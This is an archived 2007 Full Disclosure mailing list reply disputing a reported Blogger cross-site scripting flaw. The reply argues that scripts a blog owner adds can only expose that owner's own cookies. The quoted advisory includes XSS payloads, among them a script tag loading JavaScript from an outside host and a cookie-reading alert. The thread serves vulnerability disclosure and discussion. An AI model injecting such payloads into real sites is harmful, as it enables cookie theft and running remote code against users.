Full Disclosure mailing list archives
Re: BLOGGER XSS VULNERABILITY
From: Susam Pal <susam () susam in>
Date: Sun, 12 Aug 2007 21:41:05 +0530
Why is this a vulnerability? I can't see a way by which an attacker can insert JavaScript code into my blog.
I've noticed that for any blog hosted at blogspot.com the cookie will be not shown.
The sensitive cookies are not maintained under blogspot.com, so allowing JavaScript in blogspot.com doesn't look like a threat or vulnerability.
Otherwise, if the blog is located inside your web site, the cookie will be shown.
But I am the only one who is inserting the JavaScript in my blog. So, I'll end up stealing the cookies set for my domain. Why would I steal cookies set for my domain? I already know them because it is my website. Regards, Susam Pal http://susam.in/ Daniele Costa wrote, On Saturday 11 August 2007 10:52 PM:
------------------------------------------------------ BLOGGER XSS VULNERABILITY ------------------------------------------------------ Blogspot.com Homepage: http://www.blogspot.com and Blogger.com Homepage: http://www.blogger.com Affected files: Post's Input boxes ------------------------------------------------------ XSS DETAILS ------------------------------------------------------ XSS vuln via injecting javascript code into any post. Blogger doesn't sanitize user input during post process. Try injecting the following code into a post <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> or just the well known <SCRIPT>alert(document.cookie);</SCRIPT> or <SCRIPT >alert(document.domain);</SCRIPT>
<!-- COPIED IN REPLY -->
------------------------------------------------------ Proof Of Concept ------------------------------------------------------ http://pocasiculezza.blogspot.com/ ----------------------------------------------------- HISTORY ------------------------------------------------------ Discovered : 07/11/2007 by Daniele Costa Published : 07/11/2007 by Daniele Costa
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- BLOGGER XSS VULNERABILITY Daniele Costa (Aug 12)
- Re: BLOGGER XSS VULNERABILITY Susam Pal (Aug 12)
- Re: BLOGGER XSS VULNERABILITY Valdis . Kletnieks (Aug 13)
- Re: BLOGGER XSS VULNERABILITY Susam Pal (Aug 13)
- Re: BLOGGER XSS VULNERABILITY Harry Muchow (Aug 13)
- Re: BLOGGER XSS VULNERABILITY Valdis . Kletnieks (Aug 13)
- Re: BLOGGER XSS VULNERABILITY Susam Pal (Aug 12)